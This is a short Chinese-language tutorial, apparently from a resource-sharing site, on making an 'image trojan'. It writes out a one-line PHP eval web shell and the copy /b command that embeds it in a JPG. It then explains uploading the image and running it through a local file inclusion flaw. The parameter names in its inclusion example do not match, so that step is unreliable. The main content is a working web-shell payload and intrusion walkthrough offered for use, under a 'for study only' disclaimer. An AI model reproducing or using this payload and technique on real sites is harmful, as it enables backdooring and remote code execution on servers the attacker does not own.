简单图片木马的生成与利用

  1. 首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST[‘a’]);?>,确保两个文件在同一个路径下。
  2. 紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 
  3. 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们输入  start cmd;  进入
  4. 在cmd中输入 copy shell.jpg /b+txt.php/a jshell.jpg
    -b是指以二进制的方式合并复制文件,用于图像影音类文件;-a是指以ascii方式合并复制文件,用于文本类文件
  5. 然后发现在原来的路径中已经生成了我们想要的文件jshell.jpg

然后将图片上传到网站上拿到图片路径,此时虽然只是把图片木马上传上去了但是要执行必须要找包含漏洞才能执行里边的代码。

include的漏洞使用方法

有时候我们会上传一些图片木马但是却不能执行,这个时候如果有一个include的漏洞,那么图片木马就可以执行啦如下

如果php代码里有一个include($_GET[‘controller’]) 且还有一个url路径为 /index.php?controller=user    这个看起来就是一个根据参数包含执行对应控制器的代码,

但是如果url路径里的参数改成这样  /index.php?uid=/upload/images/muma.jpg    这个时候木马就执行

 

小提示:如遇到加密压缩包,默认解压密码为: luowangziyuanfenxiang 如遇到无法解压的请联系管理员!
免责声明:
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。
本站信息来自网络收集整理,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序和内容,请支持正版,购买注册,得到更好的正版服务。我们非常重视版权问题,如有侵权请邮件与我们联系处理。敬请谅解!

罗网 » 简单图片木马的生成与利用